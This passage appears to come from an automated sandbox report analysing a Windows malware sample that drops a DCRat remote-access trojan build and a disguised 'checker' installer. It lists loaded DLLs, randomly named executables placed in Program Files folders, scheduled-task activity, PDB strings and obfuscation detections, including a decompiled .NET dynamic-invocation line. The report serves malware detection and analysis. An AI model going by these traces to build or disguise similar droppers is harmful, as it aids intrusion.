                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: version.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\Desktop\gorkmTnChA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exeJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Uninstall Information\98135c31e34d63Jump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeJump to behavior
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\98135c31e34d63Jump to behavior
                                    Source: gorkmTnChA.exeStatic file information: File size 9843712 > 1048576
                                    Source: gorkmTnChA.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x961200
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: gorkmTnChA.exe, DCRatBuild.exe.0.dr
                                    Source: Binary string: wininet.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: gorkmTnChA.exe
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb@ source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ResourceCleaner.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: wininet.pdbUGP source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbl source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, lzmaextractor.dll.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, MSI4969.tmp.7.dr, MSI43FC.tmp.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: gorkmTnChA.exe
                                    Source: Binary string: -C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: gorkmTnChA.exe

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.cs.Net Code: Type.GetTypeFromHandle(VONH6ZRBck0LT59jToQ.XQJEphIDm9P(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(VONH6ZRBck0LT59jToQ.XQJEphIDm9P(16777246)),Type.GetTypeFromHandle(VONH6ZRBck0LT59jToQ.XQJEphIDm9P(16777260))})
                                    Source: shi436E.tmp.3.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0084F620 RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,FreeLibrary,3_2_0084F620
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\bridgeMonitorDhcpCommon\__tmp_rar_sfx_access_check_4793781Jump to behavior
                                    Source: DCRatBuild.exe.0.drStatic PE information: section name: .didat
                                    Source: shi436E.tmp.3.drStatic PE information: section name: .wpp_sf
                                    Source: shi436E.tmp.3.drStatic PE information: section name: .didat
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AF640 push ecx; ret 1_2_004AF653
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AEB78 push eax; ret 1_2_004AEB96
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3A88D push ebx; ret 3_3_00E3A89F
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3A88D push ebx; ret 3_3_00E3A89F
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF68 push 6800E3CFh; iretd 3_3_00E3CF6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF68 push 6800E3CFh; iretd 3_3_00E3CF6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF68 push 6800E3CFh; iretd 3_3_00E3CF6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF68 push 6800E3CFh; iretd 3_3_00E3CF6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB68 push 6800E3CBh; retf 3_3_00E3CB6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB68 push 6800E3CBh; retf 3_3_00E3CB6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB68 push 6800E3CBh; retf 3_3_00E3CB6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB68 push 6800E3CBh; retf 3_3_00E3CB6D
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB50 push eax; retf 3_3_00E3CB51
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB50 push eax; retf 3_3_00E3CB51
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB50 push eax; retf 3_3_00E3CB51
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, abDY9GRGyg7f4yrWnjk.csHigh entropy of concatenated method names: 'kpRPpwwKqWG', 'Wn4PpiPC6GN', 'RwCPpnmA2AR', 'b8SPpDd8hTh', 'lsAPp0qG7E3', 'faFPpSmrjq2', 'HJsPpuHx8Vp', 'rFSsglSHDe', 'mLAPpKnUNSw', 'HgIPpYUTfQD'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, znkgM3cwPre93RMCK8F.csHigh entropy of concatenated method names: 'eqUc01u8N6', 'wd8qoLPJLnRNIq6lhauL', 'CNUUbYPJtQfqB9XSVLRR', 'sa5M5WPJ9c23Q6xcFdJE', 'U4ajoYPJGKCjg5pPw8Z0', 'HdAcnQoTcE', 'trKYPfPJf3WV40X6vyZm', 'Mqbh5JPJdtfUHY8SEoNr', 'PSF757PJr9GI16xPYsCG', 'pNUeJePJMZQdNv1CWhFL'
